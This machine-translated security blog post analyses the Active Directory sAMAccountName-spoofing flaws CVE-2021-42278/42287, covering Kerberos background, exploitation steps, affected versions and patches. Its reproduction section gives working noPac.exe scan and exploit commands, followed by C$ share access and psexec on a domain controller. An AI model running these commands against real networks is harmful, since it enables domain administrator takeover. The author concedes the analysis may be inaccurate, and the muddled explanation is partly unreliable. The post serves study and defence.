xfeng

xfeng

Sporting | Reading | Technology | Recording
github
bilibili
Home作品集ArchivesAbout

CVE 2021-42278-42287- Local Privilege Escalation

#内网渗透#提权70
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The summary states that there is a privilege escalation vulnerability (CVE-2021-42278, CVE-2021-42287) that allows attackers to elevate the permissions of regular users to domain administrators within a domain. This vulnerability can cause significant risks and harm. The summary also mentions that someone has publicly disclosed the exploit for this vulnerability, prompting further research and analysis. The vulnerability is related to the Kerberos protocol and involves manipulating user accounts and tickets to gain unauthorized access. The affected versions of Windows Server are listed, and Microsoft has released security patches to fix the vulnerability.

I saw someone publicly disclose the EXP for CVE-2021-42287/CVE-2021-42278 privilege escalation vulnerabilities, so I looked for related information to study for learning purposes.

This privilege escalation vulnerability can elevate the privileges of ordinary users within the domain to domain admin privileges. Although certain conditions are required, the impact is still significant.

Since the information about this vulnerability is not very comprehensive and my understanding is not very thorough, the analysis in the following text may not be accurate.

1. Vulnerability Principle#

Before understanding the vulnerability principle, it is necessary to understand the principle of the Kerberos protocol.

In simple terms:

The Kerberos protocol consists of three steps:

Authentication StepAuthentication ProcessAuthentication Result
AS AuthenticationASREQ & ASREPObtain TGT
TGS AuthenticationTGSREQ & TGSREPObtain ST
TGS AuthenticationAP-REQ & AP-REPEstablish connection

The authentication process is shown in the following diagram:

image

CVE-2021-42278:

The machine user account is in the form of adding $ after the account name. Because the DC does not verify whether the machine user account ends with $, the machine username is treated as an ordinary user to perform operations.

CVE-2021-42287:

When an ordinary user obtains TGT, they request their own ST through another user, and then send the TGT to the KDC. Because the TGT is obtained using another user's information, the KDC cannot find matching user information in the database. Then, the KDC searches for the ST of the machine user and finally obtains the privileges of the machine user.

1.1 Vulnerability Process:#

  • Use a domain ordinary user to create a new machine account (domain users are allowed to create machine accounts by default).
  • Clear the SPN of the machine account, change the machine name to the domain controller name, and remove the trailing $.
  • Use the newly created machine account to initiate a Kerberos request to the domain controller to obtain TGT (Ticket Granting Ticket, the ticket of the ticket).
  • Delete the machine account and use the obtained TGT to request ST (Server Ticket) with ldap administrator service permissions.
  • The domain controller decrypts the TGT to obtain PAC (Privilege Attribute Certificate) and finds that the request is for ldap administrator service permissions. Then, the domain controller uses the hash of the ldap server administrator to encrypt the ST.
  • The ldap server administrator decrypts the PAC using their own hash.
  • The PAC is used to obtain information about the requesting user and the requested user to determine if the user has access to the service.
  • This determination process requires a request to the domain controller. The domain controller first searches the database (Active Directory) for information about the requester. Because the $ is removed, it will be treated as a domain user during the search. When no information is found, the domain controller searches for machine account information and adds $ at the end.
  • At this point, the information obtained by the domain controller is: the domain controller machine wants to request ldap administrator service. By making this request, domain controller permissions can be obtained by simply requesting the domain controller.

1.2 Vulnerability Conditions:#

  • Low-privileged domain accounts can create and modify machine accounts.
  • When searching for users during AP_REP (rather than TGS_REP), if the user is not found, search for machine users and add $ afterwards.
  • The domain controller allows delegation attacks.
  • DC is not patched with KB5008380 or KB5008602.

2. Affected Versions#

CVE-2021-42278
○ Windows Server 2012 R2
○ Windows Server 2012 (Server Core installation)
○ Windows Server 2012
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1
○ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for x64-based Systems Service Pack 2
○ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for 32-bit Systems Service Pack 2
○ Windows Server 2016 (Server Core installation)
○ Windows Server 2016
○ Windows Server, version 20H2 (Server Core Installation)
○ Windows Server, version 2004 (Server Core installation)
○ Windows Server 2022 (Server Core installation)
○ Windows Server 2019 (Server Core installation)
○ Windows Server 2022○ Windows Server 2019
○ Windows Server 2012 R2 (Server Core installation)
CVE-2021-42287
○ Windows Server 2012 R2 (Server Core installation)
○ Windows Server 2012 R2
○ Windows Server 2012 (Server Core installation)
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
○ Windows Server 2012
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1
○ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for x64-based Systems Service Pack 2
○ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for 32-bit Systems Service Pack 2
○ Windows Server 2016 (Server Core installation)
○ Windows Server 2016○ Windows Server, version 20H2 (Server Core Installation)
○ Windows Server, version 2004 (Server Core installation)
○ Windows Server 2022 (Server Core installation)
○ Windows Server 2022
○ Windows Server 2019 (Server Core installation)
○ Windows Server 2019

3. Vulnerability Reproduction#

Tools:

3.1 Scanning and Detection#

noPac.exe scan -domain redteam.club -user xfeng -pass 123456

3.2 Direct Exploitation (noPac.exe)#

noPac.exe -domain redteam.club -user test -pass pass@123 /dc ad02.redteam.club /mAccount test123 /mPassword feng /service cifs /ptt

dir \\ad01.redteam.club\c$

psexec.exe \\ad01.redteam.club cmd.exe

4. Vulnerability Fix#

Microsoft has released security patches, which can be viewed in detail at the following link: link

Check if your version of Windows has installed the corresponding security patch.

image

5. Reference Articles#

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.